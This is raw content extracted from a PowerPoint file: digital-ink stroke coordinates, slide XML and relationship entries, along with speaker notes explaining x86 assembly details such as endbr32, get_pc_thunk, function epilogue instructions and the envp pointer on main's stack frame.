0,0-1 0,0-1 0,0 0 0,0 1 0,0 7 0,0 0 0,0 0 0,-5 6 0,-3 1 0,-10 6 0,3 0 0,-10 5 0,11 8 0,-5 2 0,6 3 0,-13 14 0,3 5 0,-5 34 0,0-3 0,18 0 0,-9-18 0,11 6 0,0-23 0,-4 27 0,10-23 0,-4-2 0,6-10 0,0-12 0,0 0 0,0 5 0,0 2 0,6-5 0,1-4 0,6-11 0,0 0 0,5 0 0,16 0 0,8 0 0,14-12 0,7-11 0,-5-13 0,-7-1 0,-23 15 0,-16 9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15:02:34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0 24575,'-13'0'0,"-6"0"0,-9 0 0,-1 0 0,-5 13 0,-6 21 0,8-8 0,-2 19 0,14-30 0,0 30 0,11-26 0,-4 24 0,13-23 0,0 0 0,0 4 0,0-9 0,0 3 0,13-4 0,15-1 0,3-5 0,9 4 0,-4-10 0,6 16 0,-3-15 0,1 10 0,0-7 0,-3 1 0,4 1 0,-9 3 0,-6-3 0,-6 10 0,-7-4 0,-8 5 0,-5-6 0,0 5 0,0 2 0,-5 0 0,-3-7 0,-10-1 0,3-11 0,-4 5 0,6-6 0,6 0 0,1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15:02:35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24575,'0'36'0,"0"-3"0,0 62 0,0-21 0,0-20 0,0 2 0,0 41 0,0-18 0,0-2 0,0 5 0,0-29 0,0 13 0,0-18 0,7-17 0,-6 9 0,5-18 0,0 3 0,-4-16 0,3 2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15:02:37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0 238 24575,'0'-20'0,"0"-14"0,0 10 0,0-15 0,0 10 0,6 6 0,1-5 0,6 8 0,0 12 0,5-5 0,-4 13 0,11 0 0,-5 0 0,19 0 0,3 0 0,14 0 0,-7 6 0,-8 1 0,-9 6 0,-6 0 0,0 5 0,0 2 0,-6 6 0,-2 0 0,-5 0 0,-6-6 0,-1 4 0,-6-10 0,0 5 0,0-1 0,0-3 0,0 3 0,-12 1 0,-9-4 0,-1-2 0,-3-7 0,-1 0 0,-2 1 0,-7 1 0,3-2 0,11-1 0,3-3 0,5 3 0,0-5 0,-6 12 0,4-4 0,-4 11 0,12-6 0,1 0 0,6-6 0,0-1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15:02:53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24575,'0'85'0,"0"-10"0,0-17 0,0 3 0,0 33 0,-1-14 0,2 4 0,8-14 0,1 3-451,-6 0 1,-1 5 0,4 2 450,7 4 0,4 1 0,-1 1-531,-2 7 1,-1 2-1,2 5 531,1-11 0,2 4 0,0 2 0,-1 2-516,-3-15 1,-2 3 0,1 0 0,-1 0-1,1 0 516,1 1 0,1 0 0,0 0 0,-1 0 0,0 2 0,-1 2 0,0 2 0,0 0 0,-1 0 0,0-1 0,1 1 0,-1-1 0,1 0 0,-1 0 0,2-3 0,-1-5 0,2-2 0,-1-1 0,0-1 0,0-2 0,0 6 0,-1-3 0,0 1 0,2 5 0,2 7 0,3 8 0,1 1 0,-2-5 0,-3-11 0,-2-8 0,-2-8 0,1 4 0,2 9 0,2 8 0,0-2 0,-5-11 0,-2 7 0,-2-15 0,8 9 0,-3 14 0,0 7 0,-5-32 0,1 4 0,-2 0 0,1 11 0,1 3 0,-2-7 0,-1-2 0,-1-5 0,1 4-296,2 18 0,0 5 0,0-11 296,0-8 0,1-8 0,-1-4 0,1-2 186,-1-4 0,1 1-186,-1 10 0,2 3 0,2-2 0,3 4 0,-3-2 0,0 5 0,2 1 0,2 0 0,2 2 0,-2-1 0,-2 3 0,-1-1 0,1-1 0,0-3 0,1-1 0,-2-5 1244,1 8 0,-2-6-1244,0-7 0,0-5 0,3 31 0,-9-72 0,-7-11 0,0-33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15:02:55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8191,'0'67'0,"0"1"0,4-5 0,1 2 1806,-4 24 0,0 0-1806,3-23 0,0 0 0,-3 9 0,-2 1 1127,1-5 0,0-3-1127,0 29 921,0-37 1,0-6-922,0-6 5848,0-3-5848,0-24 1590,0-1-1590,0-8 1025,0 14-1025,0-4 212,0 12-212,0 30 0,0-10 0,0-5 0,0 7 0,0 11 0,0 5 0,-1 18 0,2 15 0,5-22 0,3 12 0,2 7 0,1 0 0,1-5-1357,-2-10 0,1-2 0,1-1 1,0 1-1,2 2 1357,-1-4 0,1 3 0,0 1 0,1 0 0,1-3 0,-1-4 0,7 16 0,0-3 0,0-4 0,0-6-187,-1-4 1,0-6-1,3 7 187,-4-5 0,3 8 0,1 3 0,-1-2 0,-1-8 0,4 12 0,-2-7 0,2 4 0,-3-6 0,1 3 0,1 1 0,-1-5 0,3 9 0,0-3 0,-2-10 0,-2-11 0,0-2 0,2 8 0,2 5 0,-4-12 0,9 3 0,-8-14 0,-19-38 0,0 0 0,-5 0 6507,5 0-6507,-6 0 837,0-1-837,0 1 0,0 0 0,0 0 0,0 6 0,0-5 0,0 5 0,0 13 0,0 0 0,0 10 0,0 6 0,-6-17 0,4 9 0,-4-7 0,0 2 0,5 27 0,-5-2 0,6 34 0,0-38 0,0 3 0,0-38 0,0-8 0,0-7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15:03:13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1796 101 24575,'-13'0'0,"0"0"0,0 0 0,0 0 0,0 0 0,-6 0 0,5 0 0,-5 0 0,6 0 0,-7 0 0,6 0 0,-6 0 0,-12 0 0,2 0 0,-33 0 0,11 0 0,-20 0 0,5 0 0,6 0 0,3-13 0,13 10 0,-13-18 0,-3 13 0,-37-6 0,32 0 0,-21 6 0,50 2 0,-15 0 0,9 4 0,-6-3 0,-4 5 0,-1 0 0,16 0 0,-5 0 0,22 0 0,0 5 0,2-3 0,6 15 0,-6-9 0,5 17 0,-11 1 0,11-5 0,-11 9 0,-2 9 0,5-7 0,-4 7 0,-6 11 0,8-17 0,-9 19 0,14-19 0,6-8 0,0-5 0,6-1 0,1-6 0,6 0 0,0-1 0,0 7 0,0-5 0,6 5 0,7 0 0,13 1 0,23 7 0,10 1 0,14 8 0,8 2 0,-19 0 0,24 5 0,-44-18 0,40 15 0,-42-17 0,14-2 0,-21-3 0,4-17 0,-9 5 0,10-6 0,-18 6 0,10 1 0,-15 0 0,10-1 0,-1 0 0,-3-5 0,5 5 0,36 6 0,-20-3 0,38 4 0,-16-6 0,-7-1 0,15 1 0,-15 1 0,-6-2 0,22 1 0,-4-6 0,7 5 0,-14-6 0,-18 0 0,10 0 0,1 0 0,-1 0 0,-3-5 0,-28-3 0,13-10 0,-22 9 0,5-14 0,-7 2 0,-4-6 0,3 1 0,-10-18 0,5-2 0,-6-18 0,0-7 0,0-3 0,0 19 0,0-34 0,0 41 0,0-24 0,0 17 0,0 4 0,-12 1 0,-10 2 0,-6 14 0,-5 6 0,13 9 0,-5 12 0,10 1 0,-3 6 0,-1 0 0,-1 0 0,-1 0 0,-3 0 0,9 0 0,-4 0 0,6 0 0,-5 0 0,3 0 0,2 0 0,7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4:28:43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24575,'0'66'0,"0"-7"0,0 19 0,0-14 0,0 11 0,0-8 0,0 7 0,0-9 0,0 12 0,0-26 0,0 12 0,0-40 0,0 5 0,0-15 0,0 5 0,0 3 0,0 6 0,0 7 0,0-17 0,0 1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15:01:02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24575,'41'0'0,"3"0"0,26 0 0,-14 0 0,27 0 0,-22 0 0,-10 0 0,3 0 0,36 0 0,4 0 0,-4 0 0,-17 0 0,-14 0 0,-4 0 0,-14 0 0,7 0 0,32 26 0,-22-6 0,1 2 0,-7-1 0,-1 0 0,6 2 0,0-2 0,4-7 0,1-5 0,1-2 0,2-3 0,12 6 0,3-5 0,1-21 0,-3-7 0,-17 6 0,-5-4 0,3-13 0,-4-3 0,27-10 0,-25 18 0,-3 16 0,-3 26 0,13 31 0,-1 6 0,3 5 0,-14-9 0,3-1 0,27 12 0,1-9 0,-29-28 0,-2-7 0,-1-3 0,-2-6 0,24-16 0,-23-3 0,-17-6 0,-20 2 0,-7 12 0,-6 1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15:03:24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24575,'28'0'0,"8"0"0,1 0 0,8 0 0,13 0 0,-1 0 0,12 0 0,-17 0 0,1 0 0,13 0 0,-11 0 0,2 0 0,32 0 0,-35 0 0,2 0 0,9 0 0,1 0 0,-1 0 0,-1 0 0,-7 0 0,-1 0 0,-2 0 0,0 0 0,36 0 0,-7 0 0,-22 7 0,19-6 0,-19 12 0,11-12 0,-18 5 0,-22-6 0,-12 0 0,-1 0 0,-12 6 0,-1-5 0,-6 5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15:00:57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24575,'-48'0'0,"7"0"0,-17 0 0,-5 0 0,14 0 0,-12 0 0,30 0 0,6 0 0,12 0 0,11 0 0,10 0 0,7 0 0,31 7 0,-12 1 0,24 6 0,0 8 0,-10-6 0,2 5 0,-9-1 0,-12-5 0,4 5 0,-5-7 0,-2 0 0,0 1 0,0 4 0,-11-3 0,2 3 0,-16-5 0,11-6 0,-11 5 0,5-5 0,-6 6 0,0 0 0,0-1 0,-12 7 0,-2-5 0,-12-1 0,-7-1 0,-2-11 0,1 5 0,-5-6 0,11 0 0,-5 0 0,7 0 0,6 0 0,-10-6 0,8-1 0,-4 0 0,7 1 0,6 0 0,0 5 0,0-5 0,0 6 0,6-6 0,1 5 0,6-5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15:00:59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0 24575,'-20'0'0,"5"0"0,-4 0 0,6 0 0,-6 0 0,4 0 0,-3 0 0,-7 0 0,2 0 0,-3 0 0,1 0 0,10 0 0,-10 0 0,11 0 0,-5 0 0,6 6 0,0-4 0,-6 9 0,5-10 0,-5 11 0,12-5 0,1 6 0,6 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 5 0,0-3 0,0 9 0,0-10 0,6 5 0,1-1 0,6 2 0,0-5 0,5 19 0,-9-22 0,8 18 0,-10-18 0,6 1 0,0 0 0,0 0 0,0 0 0,5 0 0,2-6 0,12-1 0,-11-6 0,9 0 0,-3 0 0,1 0 0,26 0 0,-4 0 0,1 0 0,-7 0 0,-29 0 0,-4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15:01:00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1 219 24575,'12'0'0,"8"0"0,19 0 0,2 0 0,14 0 0,19 0 0,0-21 0,6 8 0,-13-23 0,9-4 0,1-7 0,-9 11 0,3 10 0,-53 26 0,26 7 0,-19 23 0,13 42 0,10 13 0,15-15 0,3-1 0,-14 16 0,5-14 0,14-43 0,-5-26 0,-14-50 0,2-22 0,-6 13 0,-16 11 0,6 7 0,-3-3 0,0 12 0,7 2 0,46 14 0,-5 8 0,-25 7 0,2 4 0,-6 2 0,0 2 0,8 5 0,-3 2 0,20 10 0,-19-11 0,-3-2 0,-15-5 0,13-2 0,-30-6 0,-18-13 0,-1 35 0,0 17 0,-4 2 0,4 17 0,14-49 0,46 2 0,2-7 0,9 1 0,15 8 0,3 1-919,-2-4 0,-2 3 919,-15 8 0,-2 0-364,-9-7 0,-5-1 364,24 13 0,-32-16 0,0-3 0,24 0 0,3-7 0,-8 0 0,-6 0 0,13-13 1765,-5-17-1765,-22 11 0,1-2 400,-6-5 1,-1 0-401,37-12 0,-8 2 0,-17 13 0,1 9 0,-26 8 0,4 6 0,-29 0 0,-1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15:03:30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24575,'46'0'0,"19"0"0,-15 0 0,24 0 0,11 0 0,-35 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,1 0 0,0 0 0,2 0 0,24 0 0,1 0 0,-23 0 0,1 0 0,42 0 0,-3 0 0,-16 0 0,-9 0 0,13 0 0,-5 0 0,-6 0 0,3 0 0,-4 0 0,9 0 0,1 0 0,-7 0 0,22 0 0,-2 0-267,-10 0 0,5 0 0,-4 0 267,-16 0 0,-2-1 0,2 2 0,10 1 0,1 1 0,0 0 0,-1-2 0,0-1 0,0 1 0,3 2 0,0 0 0,0-1 0,0-1 0,-1-2 0,-2 1 0,-6 0 0,-2 0 0,-2 0 0,30 0 0,-6 0 0,-24 0 0,-2 0 0,1 0 0,-2 0 0,-14 0 0,0 0 0,10 0 0,-4 0 0,9 0 0,-21 0 200,-21 0 0,-12 0 0,-2 0 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15:03:31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13465,'28'0'0,"16"0"4482,-4 0-4482,14 0 0,5 0 0,4 0 0,31 0 964,-31 0 1,3 0-965,-5 0 0,-1 0 0,-4 0 0,-1 0 531,-3 0 0,1 0-531,15 0 0,0 0 1818,-12 0 1,0 0-1819,10 0 0,2 0 0,7 0 0,-1 0 0,-13 0 0,-1 0 0,4 0 0,-1 0 0,-6 0 0,-1 0 0,4 0 0,-2 0 0,24 0 0,4 0 0,7 0 0,-13 0 0,2 0 0,-13 0 0,4 0 0,-4 0-405,11 0 0,-6 0 405,-20 0 0,-4 0 0,29 0 0,-6 0 0,-15 0 0,-25 6 0,-20 8 0,-7-5 0,-6 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4:28:44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24575,'19'0'0,"10"0"0,9 0 0,-1 0 0,7 0 0,-14 0 0,-2 0 0,12 0 0,-16 0 0,10 0 0,-15 0 0,-12 0 0,-1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9C384-1DCB-4D80-B761-3EF626F16382}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/18/22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B40489-379A-46B4-9239-9108C8C07B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55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endbr32 is new as of 2020: bug prevention for indirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/call to ensure we land at a valid address; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>get_pc_thunk.ax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is setting up position independent code (puts current IP in the EAX in case we need anything from the GOT – the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> std lib)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40489-379A-46B4-9239-9108C8C07B9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58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dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   // clean-up code and exit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>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"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40489-379A-46B4-9239-9108C8C07B9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40489-379A-46B4-9239-9108C8C07B9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46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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pointer on the stack for main’s activation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40489-379A-46B4-9239-9108C8C07B9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87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10/18/22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10/18/22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10/18/22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10/18/22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6.xml"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink44.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink57.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink65.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink79.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink31.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink52.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink60.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink74.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink68.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink34.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink47.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink55.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink82.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink63.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink29.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink77.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink85.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink50.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink58.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink7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.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink37.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink80.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink45.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink53.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink66.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink32.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink40.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink48.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink61.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink75.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink83.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink69.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink24.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink35.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink43.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink56.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink78.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink64.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink30.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink51.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink73.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink86.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink59.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink72.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink46.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink81.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink33.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink54.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink67.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink76.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink28.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink49.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink62.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink70.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 